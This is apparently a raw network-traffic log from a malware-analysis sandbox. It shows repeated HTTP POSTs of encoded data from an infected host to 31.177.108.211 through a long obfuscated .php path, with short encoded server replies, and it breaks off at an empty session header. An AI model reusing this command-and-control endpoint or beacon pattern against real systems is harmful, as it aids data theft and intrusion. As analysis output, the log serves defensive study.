                                          Sep 13, 2024 21:04:29.712774992 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:29 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          124192.168.2.45679431.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:29.833197117 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:30.191982985 CEST2532OUTData Raw: 5b 57 43 57 55 42 59 55 59 5f 51 51 52 5d 54 54 5a 5e 5a 5e 55 53 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WCWUBYUY_QQR]TTZ^Z^USSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9B?*71=]##](89(![=3)/6Y'%/%<[';9[&!^-3


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          125192.168.2.45679531.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:30.479604006 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:30.832640886 CEST2108OUTData Raw: 5b 5f 46 55 50 40 5c 50 59 5f 51 51 52 5c 54 57 5a 53 5a 5c 55 5e 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [_FUP@\PY_QQR\TWZSZ\U^SDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9*,*Z#"^ >;5+))(4+/:Y'7$:+$,4X&+9[&!^-7
                                          Sep 13, 2024 21:04:31.228379965 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:31.358329058 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 1d 3c 26 09 57 27 15 24 0a 3b 2d 0b 09 26 2f 02 59 29 33 39 41 3c 3e 24 5b 2e 03 2a 5a 27 15 31 5d 27 3c 34 02 25 2f 3f 53 3e 00 2e 46 0d 1d 25 5d 3d 3c 30 54 3d 00 33 05 27 3e 31 5e 20 33 23 5e 24 11 23 11 23 02 3e 12 23 32 01 1c 25 29 21 5d 3b 1c 31 07 3d 32 32 58 34 36 2e 55 0f 15 3a 0f 25 21 21 0e 28 22 24 06 3e 3f 36 1d 31 3f 37 1e 27 28 2c 1a 33 06 26 52 31 01 08 00 27 32 33 59 28 13 3d 57 20 31 26 52 22 2b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989<&W'$;-&/Y)39A<>$[.*Z'1]'<4%/?S>.F%]=<0T=3'>1^ 3#^$##>#2%)!];1=22X46.U:%!!("$>?61?7'(,3&R1'23Y(=W 1&R"+'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          126192.168.2.45679631.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:30.633544922 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:30.988836050 CEST2532OUTData Raw: 5b 50 43 50 50 44 59 50 59 5f 51 51 52 50 54 54 5a 5e 5a 5e 55 5f 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [PCPPDYPY_QQRPTTZ^Z^U_SHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:?/.#!!^ #9Z*<,%*(+<00/2D&?0Z%;9[&!^-
                                          Sep 13, 2024 21:04:31.051203012 CEST1236OUTData Raw: 3f 05 3b 00 2b 57 0f 41 35 3e 01 1f 02 3b 56 3e 38 04 0c 3a 0b 3d 0a 12 39 3c 1e 08 31 3f 3d 27 3f 0a 2e 0c 22 5a 3f 55 31 2c 06 5c 08 5b 14 3b 38 09 0a 04 27 00 5f 53 37 3e 03 2b 23 21 2c 3e 27 36 3a 23 03 1c 5e 1f 33 33 39 21 20 20 56 27 3b 06
                                          Data Ascii: ?;+WA5>;V>8:=9<1?='?."Z?U1,\[;8'_S7>+#!,>'6:#^339! V';")9 9V219=Y9!9?$*>]9=&[] #7YYU6V? W91,%Y;;88)2->> >V38._>"?Z-!T!<W 1:90 =333>+5#=+.%<3:Y*_=8&D>9 788[2Y6>4;E
                                          Sep 13, 2024 21:04:31.369916916 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:31.518280029 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          127192.168.2.45679731.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:31.650233030 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:32.005398035 CEST2532OUTData Raw: 5b 52 43 56 55 4a 59 52 59 5f 51 51 52 5d 54 54 5a 5f 5a 5f 55 51 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RCVUJYRY_QQR]TTZ_Z_UQS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9C?6Z#!% #!]=+?<%*+4T<<)'#Q%82X29[&!^-3
                                          Sep 13, 2024 21:04:32.445605993 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:32.749171972 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:04:32.749185085 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          128192.168.2.45679831.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:32.892363071 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:33.241297960 CEST2532OUTData Raw: 5e 52 43 52 50 40 59 5d 59 5f 51 51 52 5e 54 55 5a 5b 5a 5c 55 52 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^RCRP@Y]Y_QQR^TUZ[Z\URSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9C?/*Z#1*"3>]*?/9_)<$%:<%,$_&+9[&!^-
                                          Sep 13, 2024 21:04:33.646543026 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:33.778697014 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:33 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          129192.168.2.45679931.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:33.894588947 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:34.238933086 CEST2532OUTData Raw: 5b 57 43 56 50 46 59 5d 59 5f 51 51 52 51 54 5a 5a 52 5a 5f 55 51 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WCVPFY]Y_QQRQTZZRZ_UQSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9<?"4%Y4>*1(*;<P??53#%\ 1/4^'+9[&!^-
                                          Sep 13, 2024 21:04:34.658682108 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:34.792778015 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:34 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          130192.168.2.45680031.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:34.921572924 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:35.270087957 CEST2532OUTData Raw: 5b 51 46 56 50 47 59 53 59 5f 51 51 52 50 54 54 5a 5b 5a 51 55 5e 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [QFVPGYSY_QQRPTTZ[ZQU^SBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9@??.#"X#0=X):+=_*;#+.[30+%9#1<?2;9[&!^-
                                          Sep 13, 2024 21:04:35.693869114 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:35.825469017 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:35 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          131192.168.2.45680131.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:35.945612907 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:36.301292896 CEST2532OUTData Raw: 5e 54 46 55 55 40 59 5d 59 5f 51 51 52 5c 54 55 5a 5b 5a 59 55 57 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^TFUU@Y]Y_QQR\TUZ[ZYUWS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:(64!643*)5+?_)(U?<9%0?1*;C&/0%9[&!^-7


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          132192.168.2.45680231.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:36.370399952 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:36.723212957 CEST2108OUTData Raw: 5b 57 46 52 50 46 5c 55 59 5f 51 51 52 5c 54 53 5a 5b 5a 5c 55 54 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WFRPF\UY_QQR\TSZ[Z\UTSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+2Z#5X 06>;*R(=Y+()<30W%*#C%<';9[&!^-7
                                          Sep 13, 2024 21:04:37.129627943 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:37.261051893 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0d 2b 35 2f 1d 33 05 27 1b 38 3e 3d 0b 30 11 3c 5c 3f 1d 25 44 28 04 3c 13 2d 14 0c 13 30 05 2d 5d 33 05 34 01 30 01 27 1b 3e 2a 2e 46 0d 1d 25 5c 3f 2f 20 1e 3e 10 2c 58 27 10 2d 5e 37 0e 3f 5d 27 01 38 0b 37 12 0c 5d 21 21 2c 0c 26 2a 2d 13 2f 43 2a 5f 28 32 3a 1c 23 26 2e 55 0f 15 3a 08 32 1f 36 56 2b 0b 20 00 3d 3c 26 1f 26 3c 23 54 26 3b 30 52 24 16 3e 1f 24 3f 08 04 26 21 3c 05 2a 3d 29 53 22 0f 00 19 35 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:+5/3'8>=0<\?%D(<-0-]340'>*.F%\?/ >,X'-^7?]'87]!!,&*-/C*_(2:#&.U:26V+ =<&&<#T&;0R$>$?&!<*=)S"5'T#(V3YT0
                                          Sep 13, 2024 21:04:37.500781059 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0d 2b 35 2f 1d 33 05 27 1b 38 3e 3d 0b 30 11 3c 5c 3f 1d 25 44 28 04 3c 13 2d 14 0c 13 30 05 2d 5d 33 05 34 01 30 01 27 1b 3e 2a 2e 46 0d 1d 25 5c 3f 2f 20 1e 3e 10 2c 58 27 10 2d 5e 37 0e 3f 5d 27 01 38 0b 37 12 0c 5d 21 21 2c 0c 26 2a 2d 13 2f 43 2a 5f 28 32 3a 1c 23 26 2e 55 0f 15 3a 08 32 1f 36 56 2b 0b 20 00 3d 3c 26 1f 26 3c 23 54 26 3b 30 52 24 16 3e 1f 24 3f 08 04 26 21 3c 05 2a 3d 29 53 22 0f 00 19 35 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:+5/3'8>=0<\?%D(<-0-]340'>*.F%\?/ >,X'-^7?]'87]!!,&*-/C*_(2:#&.U:26V+ =<&&<#T&;0R$>$?&!<*=)S"5'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          133192.168.2.45680331.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:36.495615959 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:36.848203897 CEST2532OUTData Raw: 5e 56 43 57 55 47 59 55 59 5f 51 51 52 5c 54 57 5a 5c 5a 51 55 56 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VCWUGYUY_QQR\TWZ\ZQUVSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(<:\#"2#*1(/>=(T<*Y3%9(%Z%;9[&!^-7
                                          Sep 13, 2024 21:04:37.500060081 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:37.500616074 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:04:37.500653028 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          134192.168.2.45680431.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:37.630712986 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:37.989064932 CEST2532OUTData Raw: 5b 52 43 50 50 46 59 56 59 5f 51 51 52 50 54 55 5a 5b 5a 5c 55 5e 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RCPPFYVY_QQRPTUZ[Z\U^SBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9A<27>"#-)2?=;8T+/"$ ,&*%?&+9[&!^-
                                          Sep 13, 2024 21:04:38.368002892 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:38.522285938 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:38 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          135192.168.2.45680531.177.108.21180
                                          TimestampBytes transferredDirectionData
